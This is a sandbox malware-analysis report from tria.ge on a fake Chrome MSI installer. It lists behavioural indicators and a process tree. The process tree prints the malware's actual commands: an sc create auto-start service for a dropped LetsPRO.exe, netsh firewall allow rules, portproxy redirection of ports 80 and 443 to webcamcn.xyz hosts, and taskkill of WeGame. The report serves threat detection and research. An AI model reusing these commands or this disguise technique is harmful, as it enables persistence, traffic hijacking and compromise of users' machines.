Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    299s
  • max time network
    287s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    26/04/2024, 10:42

General

  • Target

    sutup-Chrome.13.26.x64.msi

  • Size

    15.6MB

  • MD5

    86561e111e7ce97e13a9936b9b4ba849

  • SHA1

    61cd40da9253a367e416c9ab67e73738f18948c3

  • SHA256

    bd462515ea9ffe66fc27d9baa0fcc4bf733385829c2fc5676129aaeeb2e0af88

  • SHA512

    33d26416412d777fb2758bc41b44a9e9107906879c85bb4609702242deb2bcd83ed8a5f5da7a1d3e4662ca7b31dbfbbe1faa8364952546ff600136e8c2cf7d54

  • SSDEEP

    393216:qCBN2m9uaDsIqvv3/L/2m68UzYWIMWLBM36dmdRwhm7YLp:RkmqvHv1M/q8dOh

Malware Config

Signatures

  • Creates new service(s) 1 TTPs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies Installed Components in the registry 2 TTPs 7 IoCs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Sets file execution options in registry 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 64 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Loads dropped DLL 64 IoCs
  • Registers COM server for autorun 1 TTPs 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 44 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\sutup-Chrome.13.26.x64.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:836
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 57D0DF27545EC481B62429DCA585DF0F
      2⤵
      • Loads dropped DLL
      PID:2644
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      PID:2484
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:2676
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 88
        3⤵
        • Loads dropped DLL
        • Program crash
        PID:1692
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      PID:2572
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Enumerates connected drives
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:1632
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:2176
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:2012
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:1716
    • C:\Program Files (x86)\ChromeSetup.exe
      "C:\Program Files (x86)\ChromeSetup.exe"
      2⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      • Loads dropped DLL
      PID:856
      • C:\Program Files (x86)\Google\Temp\GUM146C.tmp\GoogleUpdate.exe
        "C:\Program Files (x86)\Google\Temp\GUM146C.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
        3⤵
        • Sets file execution options in registry
        • Drops file in Program Files directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1764
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies registry class
          PID:1912
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies registry class
          PID:1676
          • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:1088
          • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:1468
          • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:1992
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNzIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkU1N0U5QkYtRjZGRC00Qjg4LUI4QjctM0MyRjA5RUExRDZDfSIgdXNlcmlkPSJ7MzRGQzZFMDItQzYwRi00QzI4LTk5NDYtREQ5MkM0MTE3QjExfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezAxREI3MTQxLUFDQzYtNEM5Ny04QUM0LTI1MzRCM0Y4QTlERn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iNi4xLjc2MDEuMCIgc3A9IlNlcnZpY2UgUGFjayAxIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zNzIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7ODUyRDA3NUEtQ0I5RC02MzYwLTRFNEQtNDI3QkJCNEYxMUUxfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSI2NDkwIi8-PC9hcHA-PC9yZXF1ZXN0Pg
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:760
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{BE57E9BF-F6FD-4B88-B8B7-3C2F09EA1D6C}"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2368
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      PID:2240
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:2268
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:1616
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        PID:3056
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:384
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:2432
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      PID:488
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:324
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2548
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:560
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:1168
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:2228
  • C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\78622\786223.vbs
    1⤵
    • Modifies data under HKEY_USERS
    PID:2780
  • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
    1⤵
    • Drops file in Program Files directory
    • Executes dropped EXE
    • Loads dropped DLL
    • Modifies system certificate store
    PID:2100
    • C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\109.0.5414.120_chrome_installer.exe
      "C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\109.0.5414.120_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\gui9964.tmp"
      2⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2356
      • C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe
        "C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\gui9964.tmp"
        3⤵
        • Modifies Installed Components in the registry
        • Drops file in Program Files directory
        • Executes dropped EXE
        • Registers COM server for autorun
        • Modifies registry class
        PID:1768
        • C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe
          "C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x13f491148,0x13f491158,0x13f491168
          4⤵
          • Executes dropped EXE
          PID:1212
        • C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe
          "C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe" --system-level --verbose-logging --create-shortcuts=2 --install-level=1
          4⤵
          • Executes dropped EXE
          PID:780
          • C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe
            "C:\Program Files (x86)\Google\Update\Install\{00AEE80D-7C89-4E1A-B167-EB547052864D}\CR_AAE7A.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x13f491148,0x13f491158,0x13f491168
            5⤵
            • Executes dropped EXE
            PID:2228
    • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1048
    • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2280
    • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNzIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkU1N0U5QkYtRjZGRC00Qjg4LUI4QjctM0MyRjA5RUExRDZDfSIgdXNlcmlkPSJ7MzRGQzZFMDItQzYwRi00QzI4LTk5NDYtREQ5MkM0MTE3QjExfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0FBNjg0MDlELTc3OUMtNDFCNC04RUY5LTk3RTREQzQzQTAwN30iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iNi4xLjc2MDEuMCIgc3A9IlNlcnZpY2UgUGFjayAxIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTA5LjAuNTQxNC4xMjAiIGFwPSJ4NjQtc3RhYmxlLXN0YXRzZGVmXzEiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMTQ4IiBpaWQ9Ins4NTJEMDc1QS1DQjlELTYzNjAtNEU0RC00MjdCQkI0RjExRTF9IiBjb2hvcnQ9IjE6MWc4eDoiIGNvaG9ydG5hbWU9IldpbmRvd3MgNyI-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9lZGdlZGwubWUuZ3Z0MS5jb20vZWRnZWRsL3JlbGVhc2UyL2Nocm9tZS9jemFvMmhydnBrNXdncXJrejRra3M1cjczNF8xMDkuMC41NDE0LjEyMC8xMDkuMC41NDE0LjEyMF9jaHJvbWVfaW5zdGFsbGVyLmV4ZSIgZG93bmxvYWRlZD0iOTMxMjI2MDAiIHRvdGFsPSI5MzEyMjYwMCIgZG93bmxvYWRfdGltZV9tcz0iMTI0MTciLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjM2NTEiIGRvd25sb2FkX3RpbWVfbXM9IjEzMDQyIiBkb3dubG9hZGVkPSI5MzEyMjYwMCIgdG90YWw9IjkzMTIyNjAwIiBpbnN0YWxsX3RpbWVfbXM9IjM3NzgzIi8-PC9hcHA-PC9yZXF1ZXN0Pg
      2⤵
      • Executes dropped EXE
      PID:1652
  • C:\Windows\system32\cmd.exe
    cmd /c cscript C:\Users\Admin\78622\786223.vbs
    1⤵
      PID:2444
      • C:\Windows\system32\cscript.exe
        cscript C:\Users\Admin\78622\786223.vbs
        2⤵
        • Modifies data under HKEY_USERS
        PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe cscript C:\Users\Admin\78622\786223.vbs
      1⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2496
      • C:\Windows\system32\wermgr.exe
        "C:\Windows\system32\wermgr.exe" "-outproc" "2496" "752"
        2⤵
          PID:1960
      • C:\Windows\system32\sc.exe
        sc create 786223559 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 786223559
        1⤵
        • Launches sc.exe
        PID:2108
      • C:\Windows\system32\netsh.exe
        netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
        1⤵
        • Modifies data under HKEY_USERS
        PID:2472
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
        1⤵
        • Modifies Windows Firewall
        • Modifies data under HKEY_USERS
        PID:1228
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
        1⤵
        • Modifies Windows Firewall
        • Modifies data under HKEY_USERS
        PID:1668
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
        1⤵
        • Modifies Windows Firewall
        • Modifies data under HKEY_USERS
        PID:2600
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
        1⤵
        • Modifies Windows Firewall
        • Modifies data under HKEY_USERS
        PID:540
      • C:\Windows\system32\netsh.exe
        netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
        1⤵
        • Modifies data under HKEY_USERS
        PID:2900
      • C:\Windows\system32\taskkill.exe
        taskkill /f /t /im wegame.exe
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2776
      • C:\Windows\system32\taskkill.exe
        taskkill /f /t /im WeGame.exe
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2208
      • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe" -Embedding
        1⤵
        • Executes dropped EXE
        PID:1224
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand
          2⤵
          • Executes dropped EXE
          PID:2148
          • C:\Program Files\Google\Chrome\Application\chrome.exe
